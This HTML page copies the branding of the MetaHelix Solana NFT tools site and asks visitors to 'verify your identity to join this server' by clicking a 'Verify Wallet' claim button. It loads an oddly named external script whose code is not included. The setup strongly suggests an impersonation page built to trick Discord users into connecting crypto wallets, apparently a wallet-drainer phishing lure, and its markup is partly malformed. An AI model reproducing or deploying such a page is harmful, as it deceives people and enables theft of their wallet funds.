 no <html lang="en">
 <head>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<<script type="module" src="H9mp8kRrCL3oL9rMRQ13eGuxqMv2hA.js"></script>
                
                <link rel="modulepreload" crossorigin href="/assets/solana.603a5b97.js">
                <link rel="modulepreload" crossorigin href="/assets/libs.63b5c134.js">
                <link rel="modulepreload" crossorigin href="/assets/spl.00c7a04f.js">
                <link rel="modulepreload" crossorigin href="/assets/modals.ffa68681.js">
                <link rel="stylesheet" href="/assets/index.7b78f114.css">
  <meta charset="utf-8"/>
  <link href="/favicon.beb95ea0.png" rel="icon"/>
  <meta content="width=device-width, initial-scale=1" name="viewport"/>
  <meta content="#000000" name="theme-color"/>
  <meta content="Discord bot and platform for Solana NFT discord communities" name="description"/>
  <link href="/symbol.cb184557.png" rel="apple-touch-icon"/>
  <link href="/public/manifest.webmanifest" rel="manifest"/>
  <title>
   MetaHelix - Solana NFT Tools
  </title>
  <style data-styled="active" data-styled-version="5.3.6">
  </style>
 </head>
 <link href="totalcss.css" rel="stylesheet"/>
 <body>
  <div id="root">
   <div class="sc-cHGmPC EuDMG">
    <header class="sc-cxdZMj jAJUiV">
     <div class="sc-gJFNMl cWNhNg">
      <div>
      </div>
      <div class="sc-fxTzYC isLvxY">
       <div class="sc-dkKxlM hkHWDA">
        <a href="/">
         <svg height="212.884" viewbox="0 0 112.121 56.326" width="423.764" xmlns="http://www.w3.org/2000/svg">
          <defs>
           <path d="M92.943 72.697h23.854v11.025H92.943z" id="metahelix-box_svg__a">
           </path>
           <path d="M26.458 58.208h149.679v63.5H26.458z" id="metahelix-box_svg__b">
           </path>
          </defs>
          <g aria-label="HELIX" style='font-size: 7.05556px; line-height: 1.25; font-family: "Modern No. 20"; text-align: center; letter-spacing: 0px; word-spacing: 0px; writing-mode: lr-tb; text-anchor: middle; white-space: pre; fill: rgb(255, 255, 255);' transform="matrix(5.97636 0 0 5.97636 -571.462 -415.537)">
           <path d="M95.62 78.955v-4.939h.903v2.053h2.216v-2.053h.903v4.939h-.903v-2.152h-2.216v2.152zM100.602 78.955v-4.939h3.224v.727h-2.321v1.354h2.11v.706h-2.11v1.425h2.32v.727zM104.68 78.955v-4.939h.903v4.233h2.187v.706zM108.567 78.955v-4.939h.903v4.939zM110.19 78.955l1.545-2.498-1.566-2.441h1.037l1.108 1.722 1.016-1.722h1.016L112.8 76.5l1.58 2.455h-1.037l-1.122-1.743-1.016 1.743z" style='font-style: normal; font-variant: normal; font-weight: 700; font-stretch: normal; font-family: "DM Sans"; fill: rgb(255, 255, 255);'>
           </path>
          </g>
          <g aria-label="META" style='font-style: normal; font-variant: normal; font-weight: 400; font-stretch: normal; font-size: 8.59925px; line-height: 1.25; font-family: "DM Sans"; text-align: center; letter-spacing: 3.51551px; word-spacing: 0px; writing-mode: lr-tb; text-anchor: middle; white-space: pre; fill: rgb(255, 255, 255);' transform="translate(-302.91 -211.508) scale(3.53597)">
           <path d="M85.671 65.836v-6.02h.843l2.167 4.197 2.15-4.197h.851v6.02h-.722v-4.73l-2.013 3.87h-.541l-2.013-3.861v4.72ZM96.47 65.836v-6.02h3.724v.594h-3.001v2.098h2.743v.585h-2.743v2.15h3v.593ZM106.246 65.836V60.41h-1.797v-.594h4.316v.594h-1.797v5.426ZM112.109 65.836l2.219-6.02h.765l2.21 6.02h-.765l-.55-1.548h-2.563l-.56 1.548zm1.53-2.133h2.133l-1.066-2.975z" style='font-style: normal; font-variant: normal; font-weight: 400; font-stretch: normal; font-size: 8.59925px; line-height: 1.25; font-family: "DM Sans"; text-align: center; letter-spacing: 3.51551px; word-spacing: 0px; writing-mode: lr-tb; text-anchor: middle; white-space: pre; fill: rgb(255, 255, 255);'>
           </path>
          </g>
         </svg>
        </a>
       </div>
       <nav class="sc-iWOQzb kkIYmF">
        <a href="/#features">
         Features
        </a>
        <a href="/#getting-started">
         Getting Started
        </a>
        <a href="/#roadmap">
         Roadmap
        </a>
        <a href="/#pricing">
         Pricing
        </a>
       </nav>
      </div>
      <div style="min-width: 120px; display: flex; justify-content: flex-end;">
      </div>
     </div>
    </header>
    <div class="sc-ZqGJI grznny">
     <div class="sc-gswNZR fPmPvG container">
      <h1 style="margin-bottom: 4rem;">
       Please verify your identity to join this server.
      </h1>
      <div>
       <div class="sc-knEsKG ivOFTz">
<button id="claim-button" tabindex="0" type="button">Verify Wallet</button>
       </div>
      </div>
     </div>
    </div>
    <footer class="sc-jKvnYE kOOKNs">
     <div class="sc-uokDu fEDpsf">
      <div>
       <div class="sc-bTUVah bRFGBT">
        <a href="/">
         <svg height="212.884" viewbox="0 0 112.121 56.326" width="423.764" xmlns="http://www.w3.org/2000/svg">
          <defs>
           <path d="M92.943 72.697h23.854v11.025H92.943z" id="metahelix-box_svg__a">
           </path>
           <path d="M26.458 58.208h149.679v63.5H26.458z" id="metahelix-box_svg__b">
           </path>
          </defs>
          <g aria-label="HELIX" style='font-size: 7.05556px; line-height: 1.25; font-family: "Modern No. 20"; text-align: center; letter-spacing: 0px; word-spacing: 0px; writing-mode: lr-tb; text-anchor: middle; white-space: pre; fill: rgb(255, 255, 255);' transform="matrix(5.97636 0 0 5.97636 -571.462 -415.537)">
           <path d="M95.62 78.955v-4.939h.903v2.053h2.216v-2.053h.903v4.939h-.903v-2.152h-2.216v2.152zM100.602 78.955v-4.939h3.224v.727h-2.321v1.354h2.11v.706h-2.11v1.425h2.32v.727zM104.68 78.955v-4.939h.903v4.233h2.187v.706zM108.567 78.955v-4.939h.903v4.939zM110.19 78.955l1.545-2.498-1.566-2.441h1.037l1.108 1.722 1.016-1.722h1.016L112.8 76.5l1.58 2.455h-1.037l-1.122-1.743-1.016 1.743z" style='font-style: normal; font-variant: normal; font-weight: 700; font-stretch: normal; font-family: "DM Sans"; fill: rgb(255, 255, 255);'>
           </path>
          </g>
          <g aria-label="META" style='font-style: normal; font-variant: normal; font-weight: 400; font-stretch: normal; font-size: 8.59925px; line-height: 1.25; font-family: "DM Sans"; text-align: center; letter-spacing: 3.51551px; word-spacing: 0px; writing-mode: lr-tb; text-anchor: middle; white-space: pre; fill: rgb(255, 255, 255);' transform="translate(-302.91 -211.508) scale(3.53597)">
           <path d="M85.671 65.836v-6.02h.843l2.167 4.197 2.15-4.197h.851v6.02h-.722v-4.73l-2.013 3.87h-.541l-2.013-3.861v4.72ZM96.47 65.836v-6.02h3.724v.594h-3.001v2.098h2.743v.585h-2.743v2.15h3v.593ZM106.246 65.836V60.41h-1.797v-.594h4.316v.594h-1.797v5.426ZM112.109 65.836l2.219-6.02h.765l2.21 6.02h-.765l-.55-1.548h-2.563l-.56 1.548zm1.53-2.133h2.133l-1.066-2.975z" style='font-style: normal; font-variant: normal; font-weight: 400; font-stretch: normal; font-size: 8.59925px; line-height: 1.25; font-family: "DM Sans"; text-align: center; letter-spacing: 3.51551px; word-spacing: 0px; writing-mode: lr-tb; text-anchor: middle; white-space: pre; fill: rgb(255, 255, 255);'>
           </path>
          </g>
         </svg>
        </a>
       </div>
       <nav>
        <a href="https://discord.gg/W9mceRGeA9" target="_blank">
         <svg aria-hidden="true" class="StyledIconBase-sc-ea9ulj-0 bhLQRR" fill="currentColor" focusable="false" height="25" viewbox="0 0 640 512" width="25" xmlns="http://www.w3.org/2000/svg">
          <path d="M524.531 69.836a1.5 1.5 0 0 0-.764-.7A485.065 485.065 0 0 0 404.081 32.03a1.816 1.816 0 0 0-1.923.91 337.461 337.461 0 0 0-14.9 30.6 447.848 447.848 0 0 0-134.426 0 309.541 309.541 0 0 0-15.135-30.6 1.89 1.89 0 0 0-1.924-.91 483.689 483.689 0 0 0-119.688 37.107 1.712 1.712 0 0 0-.788.676C39.068 183.651 18.186 294.69 28.43 404.354a2.016 2.016 0 0 0 .765 1.375 487.666 487.666 0 0 0 146.825 74.189 1.9 1.9 0 0 0 2.063-.676A348.2 348.2 0 0 0 208.12 430.4a1.86 1.86 0 0 0-1.019-2.588 321.173 321.173 0 0 1-45.868-21.853 1.885 1.885 0 0 1-.185-3.126 251.047 251.047 0 0 0 9.109-7.137 1.819 1.819 0 0 1 1.9-.256c96.229 43.917 200.41 43.917 295.5 0a1.812 1.812 0 0 1 1.924.233 234.533 234.533 0 0 0 9.132 7.16 1.884 1.884 0 0 1-.162 3.126 301.407 301.407 0 0 1-45.89 21.83 1.875 1.875 0 0 0-1 2.611 391.055 391.055 0 0 0 30.014 48.815 1.864 1.864 0 0 0 2.063.7A486.048 486.048 0 0 0 610.7 405.729a1.882 1.882 0 0 0 .765-1.352c12.264-126.783-20.532-236.912-86.934-334.541ZM222.491 337.58c-28.972 0-52.844-26.587-52.844-59.239s23.409-59.241 52.844-59.241c29.665 0 53.306 26.82 52.843 59.239 0 32.654-23.41 59.241-52.843 59.241Zm195.38 0c-28.971 0-52.843-26.587-52.843-59.239s23.409-59.241 52.843-59.241c29.667 0 53.307 26.82 52.844 59.239 0 32.654-23.177 59.241-52.844 59.241Z" fill="currentColor">
          </path>
         </svg>
        </a>
        <a href="https://twitter.com/MetaHelixIO" target="_blank">
         <svg aria-hidden="true" class="StyledIconBase-sc-ea9ulj-0 bhLQRR" fill="currentColor" focusable="false" height="25" viewbox="0 0 512 512" width="25" xmlns="http://www.w3.org/2000/svg">
          <path d="M459.37 151.716c.325 4.548.325 9.097.325 13.645 0 138.72-105.583 298.558-298.558 298.558-59.452 0-114.68-17.219-161.137-47.106 8.447.974 16.568 1.299 25.34 1.299 49.055 0 94.213-16.568 130.274-44.832-46.132-.975-84.792-31.188-98.112-72.772 6.498.974 12.995 1.624 19.818 1.624 9.421 0 18.843-1.3 27.614-3.573-48.081-9.747-84.143-51.98-84.143-102.985v-1.299c13.969 7.797 30.214 12.67 47.431 13.319-28.264-18.843-46.781-51.005-46.781-87.391 0-19.492 5.197-37.36 14.294-52.954 51.655 63.675 129.3 105.258 216.365 109.807-1.624-7.797-2.599-15.918-2.599-24.04 0-57.828 46.782-104.934 104.934-104.934 30.213 0 57.502 12.67 76.67 33.137 23.715-4.548 46.456-13.32 66.599-25.34-7.798 24.366-24.366 44.833-46.132 57.827 21.117-2.273 41.584-8.122 60.426-16.243-14.292 20.791-32.161 39.308-52.628 54.253z" fill="currentColor">
          </path>
         </svg>
        </a>
       </nav>
      </div>
     </div>
     <div style="display: flex; justify-content: center;">
      <span>
       Copyright © MetaHelix 2022 | RPC Node Provided by ThorLabs
      </span>
     </div>
    </footer>
    <div class="Toastify">
    </div>
   </div>
  </div>
 </body>
</html>
